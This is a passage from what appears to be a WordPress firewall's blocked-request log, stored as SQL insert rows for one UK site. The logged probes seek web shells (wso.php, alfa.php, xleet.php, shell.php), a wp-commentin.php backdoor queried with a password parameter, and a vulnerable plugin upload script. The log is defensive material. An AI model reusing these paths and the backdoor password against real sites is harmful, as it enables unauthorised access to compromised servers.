User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11428,1673978372.687544,1673978372.547600,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11429,1673978365.673526,1673978365.547700,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11430,1673978339.147454,1673978339.019300,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11431,1673978323.408857,1673978323.281100,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11432,1673982145.182778,1673982145.055800,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11433,1673982139.624370,1673982139.506300,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11434,1673982135.949109,1673982135.815500,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11435,1673982130.863066,1673982130.732800,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11436,1673995180.348818,1673995180.216000,'\0\0\0\0\0\0\0\0\0\0���*!',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/core-stab/index.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11437,1673997429.273665,1673997429.146700,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11438,1673997424.898178,1673997424.770000,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11439,1673997397.435264,1673997397.301300,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11440,1673997392.889683,1673997392.756800,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11441,1674003428.452611,1674003428.323300,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11442,1674003398.883109,1674003398.750600,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11443,1674003391.527348,1674003391.387300,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11444,1674003361.151101,1674003360.991300,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11445,1674003473.004721,1674003472.878100,'\0\0\0\0\0\0\0\0\0\0��\n3',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11446,1674004418.345796,1674004418.205500,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93aGF0c215cmFuay1kZXZlbmMvcGhwLW9mYy1saWJyYXJ5L29mY191cGxvYWRfaW1hZ2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11447,1674015043.810013,1674015043.665200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11448,1674015043.487602,1674015043.380300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11449,1674015043.224675,1674015043.116400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11450,1674015042.931710,1674015042.786400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11451,1674015042.599082,1674015042.450900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11452,1674015042.253699,1674015042.142600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11453,1674015041.961926,1674015041.834100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11454,1674015041.669240,1674015041.549900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11455,1674015041.393989,1674015041.276600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11456,1674015041.086735,1674015040.972000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11457,1674015040.800361,1674015040.668700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11458,1674015040.417502,1674015040.306300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11459,1674015040.144962,1674015039.997800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11460,1674015039.844420,1674015039.736500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11461,1674015039.548207,1674015039.443300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11462,1674015039.227380,1674015039.116000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 